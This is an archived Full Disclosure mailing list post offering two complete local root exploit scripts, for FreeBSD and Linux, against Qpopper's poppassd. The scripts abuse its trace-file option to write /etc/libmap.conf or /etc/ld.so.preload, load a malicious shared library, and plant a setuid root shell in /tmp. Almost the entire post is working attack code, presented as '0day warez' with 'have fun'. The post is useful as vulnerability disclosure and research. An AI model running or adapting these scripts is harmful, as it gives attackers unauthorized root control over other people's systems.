Full Disclosure mailing list archives
It's time for some warez - Qpopper poppassd local r00t exploit
From: kcope <kingcope () gmx net>
Date: Sat, 24 Sep 2005 22:26:51 +0200
hello this is kcope,here is my Qpopper poppassd local r00t exploit (latest version, 0day) both for linux and freebsd systems... have fun 8-)#
#!/bin/sh ########################################################################### # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ### # tested on FreeBSD 5.4-RELEASE ### ########################################################################### POPPASSD_PATH=/usr/local/bin/poppassd HOOKLIB=libutil.so.4 echo "" echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep 2 umask 0000 if [ -f /etc/libmap.conf ]; then echo "OOPS /etc/libmap.conf already exists.. exploit failed!" exit fi cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { remove("/etc/libmap.conf"); execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); } } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 echo "--- Now type ENTER ---" echo "" $POPPASSD_PATH -t /etc/libmap.conf echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf su if [ -f /tmp/xxxx ]; then echo "IT'S A ROOTSHELL!!!" /tmp/xxxx else echo "Sorry, exploit failed." fi
#!/bin/sh ########################################################################### # Linux Qpopper poppassd latest version local r00t exploit by kcope ### # August 2005 ### # Confidential - Keep Private! ### ########################################################################### POPPASSD_PATH=/usr/local/bin/poppassd echo "" echo "Linux Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep 2 umask 0000 if [ -f /etc/ld.so.preload ]; then echo "OOPS /etc/ld.so.preload already exists.. exploit failed!" exit fi cat > program.c << _EOF #include <unistd.h> #include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { if (!geteuid()) { setgid(0); setuid(0); remove("/etc/ld.so.preload"); execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL); } } _EOF gcc -o program.o -c program.c -fPIC gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles cat > suid.c << _EOF int main(void) { setgid(0); setuid(0); unlink("/tmp/suid"); execl("/bin/sh","sh",0); } _EOF gcc -o /tmp/suid suid.c cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 echo "--- Now type ENTER ---" echo "" $POPPASSD_PATH -t /etc/ld.so.preload echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload su if [ -f /tmp/suid ]; then echo "IT'S A ROOTSHELL!!!" /tmp/suid else echo "Sorry, exploit failed." fi
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- It's time for some warez - Qpopper poppassd local r00t exploit kcope (Sep 24)
- Re: It's time for some warez - Qpopper poppassd local r00t exploit Harry Hoffman (Sep 25)